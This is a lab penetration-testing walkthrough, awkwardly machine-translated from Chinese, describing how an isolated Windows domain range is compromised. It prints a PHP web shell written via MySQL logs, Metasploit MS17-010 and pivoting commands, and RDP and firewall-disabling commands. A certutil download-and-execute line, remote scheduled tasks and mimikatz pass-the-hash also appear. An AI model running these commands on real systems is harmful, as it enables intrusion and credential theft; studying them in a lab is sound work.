Actual target shooting - skillfully use SMB to take down the off-line host

This article was written by a friend @Drunkmars contribute , It's very detailed , Suitable for novice friends to learn , The first prophet community .

0x01 Preface

Before, when playing a domain environment, the hosts in the domain did not leave the network , It was cs Of socks The agent transfers the traffic from the non outgoing host to the edge host . I didn't think much about it , After coming down, I thought of setting up an environment to reproduce the situation at that time , See if there is a simpler way to lay down the host that cannot leave the network .

By chance , It's not bad to find this domain environment , In the process of reappearance, some knowledge touched my knowledge blind spot , I also gained a lot of new knowledge . Specially record the process , Share with the masters who want to learn how to play the non outgoing host in the domain .

0x02 Range address assignment

Intranet segment ：192.168.52.0/24

External network segment ：192.168.10.0/24

attack ：

kali：192.168.10.11

shooting range ：

win7( Inside )：192.168.52.143

win7( Outside )：192.168.10.15

Domain host ：

Winserver2003：192.168.52.141

Winserver2008：192.168.52.138

among win7 You can use the Internet 、 Intranet communication , The hosts in the domain can only communicate with each other in the intranet

In limine DCping no win7,win7 After closing the firewall, you can ping through

open C On the plate phpstudy Directory open web service

0x03 web Server penetration

nmap Detection port

nmap -sS -P0 -sV -O 192.168.10.15

opened 80 port , Try to visit web Address , Found as php probe

Slide to the bottom , I found one at the bottom of the website MySQL Database connection detection

Weak password root/root Successful connection

Scan the background

I use the imperial sword here , But it's like , Because when I went to the Internet after I finished the shooting range, I found that many of them swept out one cms, adopt cms You can also take shell, I won't show you how to use cms Weak passwords are written in the background shell 了 , If you are interested, you can search by yourself

Find out phpmyadmin Catalog , still root/root Weak password login succeeded

After entering, the interface is as follows

adopt phpmyadmin Write shell

adopt phpmyadmin Write shell There are two ways , First of all, I try to select into outfile Direct write , But he's here secure_file_priv The value of is NULL, So it's impossible to raise the right

Only another method can be used , Write with the global log shell

SHOW VARIABLES LIKE '%general%'

Check the configuration , You can see that the global log is closed ,gengeral_log_file Returned the absolute address of the log

I'll open its global log first , Then write a sentence into its path

set global general_log = on;

Open the global log and modify the absolute path , Notice there's a hole , The path that the log returns to us is C:\\phpStudy\\MySQL\\data\\stu1.log, however mysql The absolute address to visit is C:\\phpStudy\\WWW A file in a directory , So this place writes shell It has to be written WWW Only under the directory can we connect with ant sword

set global general_log_file='C:\\phpStudy\\WWW\\shell.php';

Here's another sentence: Trojan horse

select '<?php eval($_POST[cmd]);?>'

Then connect with the ant sword

You can see that the connection is successful

0x04 Intranet information collection

View the permissions of the system , It's coming up administrator Authority is very comfortable

ipconfig /all View network information , Domain environment + The double card

tasklist /svc Take a cursory look at , There seems to be no soft killing

Thinking about not killing soft , So go straight to the most simple and crude cs More worry free , Upload a cs Generated Trojan exe To the target host

Go online with planned tasks cs

Successful launch

0x05  Intranet penetration

Information gathering

net view View domain information

Use cs The built-in port scan sweeps the host

Scan out all the hosts as follows

hashdump Catch a wave hash

logonpasswords Catch a wave of plaintext

All the documents are as follows , The reason is that the password has to be reset before login , Got a password with personal information

Ideas

Here I tested , Because the target host did not turn on the firewall , Is able to pass cs Self contained psexec A wave of horizontal grasp domain control and domain machine password , But in view of this win7 Double network card and other hosts in the domain are not out of the network , Practice how to get out of the network

There are several ways for the machine to go online ：

• Use smb beacon
• To configure listener adopt HTTP Agent online
• Use pystinger build socks4 agent

Here I use SMB beacon This method

SMB

Beacon Use named pipes through the parent Beacon To communicate , When two Beacons After link , Son Beacon From father Beacon Get task and send . Because of the linked Beacons Use Windows Named pipes for communication , This traffic is encapsulated in SMB Agreement , therefore SMB beacon Relative concealment .SMB beacon The available load cannot be generated directly , Only use  PsExec  or  Stageless Payload go online

First of all, we get the information of a host in the intranet beacon, Grab the password and do smb Spray , Get another one open 445 Port on the machine administrator Account password , When the target machine is not out of the network , have access to Smb beacon Bring the target host online

1. Conditions of use

• have SMB Beacon The host for must accept 445 Connection on Port .
• Can only be linked by the same Cobalt Strike Instance management Beacon.
• Use this beacon Traverse must have the administrator rights of the target host, or the credentials with administrator rights .

2. Usage method

(1) establish smb listener

(2) stay cs Use in psexec Move horizontally , Choose the existing beacon As a springboard , Here the credentials have to be administrator, I.e. have the administrator rights of the target host

(3) Successful connection , You can see smb beacon On the right side of the online host is ∞∞ identification

Machines that go online in this way , Mainly through the net machine as a middleman , After the host is successfully online , If the net machine is disconnected , This non network host will also be disconnected

0x06  Horizontal penetration of the intranet

Ideas

use Ladon Sweep the eternal blue of Intranet , I found that these hosts all exist MS17-010

ms17010 Common ways of playing ：

• msf
• ladon/ladon_ms17010
• from msf Separated exe
• nessus Inside exe
• cs plug-in unit

These kinds of play , I've tried in this environment . The process will not be described one by one , Let's just talk about the results of my test

msf It's the most stable , But it's a little bit of a hassle, because you have to set up the monitor module and select the attack module .ladon_ms17010 It's convenient, but it's not stable. Sometimes it won't work .cs Plugins aren't stable either , And in this case, the success rate will be lower

In this case of not being out of the network , Priority can be given to using from msf Separated exe and ladon_ms17010 To fight , Success will be directly through the custom dll Create a new user and join the administrators group , Turn on 3389 port , And there will be a sticky key back door

According to the actual situation , You can consider logging in directly and remotely at an appropriate time and under suitable conditions , Flip through sensitive data , Often because of a lot of operation and maintenance personnel “ Good habit ” And bring a lot of convenience to penetration , for instance “ Cipher book .txt”

cs The derived msf conversation

msf Set listening port

cs Create a new port, set up a conversation

Run to get meterpreter

ms_17_010 Get domain control permission

Here because I know DC Yes, there is ms_17_010 This loophole is , So I first tried to play with eternal blue , Use the following modules

exploit/windows/smb/ms17_010_eternalblue

Found after running exp It's been called, but it's not session establish

Another ms17010 Module

use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp

Also did not get shell, I didn't think about it , Then I thought it might be win7 In two network segments , So you can't get it directly with eternal blue shell Of

msf The machine that can't get out of the net ms_17_010

I think I got it before win7 Of meterpreter, So try adding routes .

msf It's very stable and fragrant when fighting alone .win7 stay msf After the launch , Because we know in advance , There is 52 This segment that doesn't go out of the net , So you need to be in msf Add route to

1. View routes

run get_local_subnets

2. Add route

run autoroute -s 192.168.52.0/24

3. View added routes

run autoroute -p

4. Start the attack

hold shell Switch to the background , Reuse ms17_010_eternalblue modular

This time we were able to make a connection

ms_17_010 Module to summarize

Vulnerability detection methods ：

Set a goal ip And thread , Here, because the machine with the loophole has been swept out , So there was no vulnerability detection .

use auxiliary/scanner/smb/smb_ms17_010

Exploits often use ：

The first and third modules here require the target to open the named pipe , And it's more stable . As long as there are loopholes in the second module , But there's a chance to put the target on the blue screen , And soft interception will be more strict , If there is killing software, you can basically give up this module .

auxiliary/admin/smb/ms17_010_command
exploit/windows/smb/ms17_010_eternalblue
exploit/windows/smb/ms17_010_psexec

Fight ms17010 When , Might as well use auxiliary/admin/smb/ms17_010_command The module detects if a named pipe can be used .

use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.164.156 192.168.164.161
set command tasklist
show options
run

If the command is executed successfully, we can give priority to these two modules

auxiliary/admin/smb/ms17_010_command
exploit/windows/smb/ms17_010_psexec

WMI Get domain control server

Because I used two before ms_17_010 All of the modules failed , and session Playing backstage is the only way to think of it , When the module didn't succeed, I decided to find another way

First of all, I turn on 3389 Port and close the firewall into win7 Remote desktop

Registry open 3389 port

REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Turn off firewall

#windows server 2003 Before 
netsh firewall set opmode disable 
#windows server 2003 after 
netsh advfirewall set allprofiles state off

At this time, the firewall is on , Turn off firewall , Use domain users god\\administrator/[email protected] Successful login to this one win7WEB host

Upload vmiexec.vbs To 192.168.52.143（win7） On the machine , And then execute

cscript.exe vmiexec.vbs /cmd 192.168.52.138 administrator [email protected] "whoami"

Because I use it. vbs It didn't echo several times , So what I use here is Ladon.exe, perform

Ladon.exe wmiexec 192.168.52.138 administrator [email protected] whoami

The same process as above , Get a positive msf Connect , The process is as follows ：

First, generate a positive exe Files in win7 On the website directory of

stay win7 Take a look , Upload successful

stay win7 Upper use WMI Carry out orders

certutil.exe -urlcache -split -f http://192.168.52.143/6666.exe&6666.exe

Successful execution , At this time 138 machine （ namely DC-win2008） Upper opening 6666 Port listening

stay msf Last run blin_tcp To get a reply

Successfully obtained domain control permission , Follow up rights

Use CVE-2018-8120 Raise the right , Successfully mentioned system permissions , Here I think about using MS14-068 Should also be able to raise power successfully

Successful claim , Don't kill on the street mimikatz, Successfully caught hash

Bill plus plan task acquisition DC

Use it here first msf Command to generate a positive horse  yukong.exe

windows/reverse_bind_tcp LHOST=192.168.10.11 LPORT=7777

Copy the horse to the domain control machine

shell copy C:\\yukong.exe \\192.168.52.138\\c$

Then use this method to write the scheduled task to connect , Here, the horse rebound will not succeed , So use the following command

shell schtasks /create /tn "test" /tr C:\\yukong.exe /sc once /st 22:14 /S 192.168.52.138 /RU System /u administrator /p "[email protected]"

Hang on win7 agent

proxy nc -vv 192.168.52.138 7777

You can bounce back DC Of shell, Then clear the scheduled tasks

schtasks /delete /s 192.168.52.138 /tn "test" /f

Use mimikatz Conduct hash Pass on

mimikatz sekurlsa::pth /domain:god.org /user:administrator /ntlm:81be2f80d568100549beac645d6a7141

see DC The catalog of

shell dir \\192.168.52.138\\c$ //dir

0x07  Postscript

Of course, there are many ways to obtain domain control permissions in the end , Such as pth attack 、 Horizontal hash passing 、redis wait , In some places, the method I used is not the only one , Such as by scanning the directory found that cms Go into the background and write shell, Use a proxy to win7 The way to turn the flow out , It's all worth learning .

Through this range, we not only practiced some methods that we have seen but don't know how to use in actual combat , Also improved their ability to solve problems independently , Also learned a lot of new knowledge , Such as through phpmyadmin Write shell wait , In the words of predecessors, it is ： Low key development , Concentrate on safety .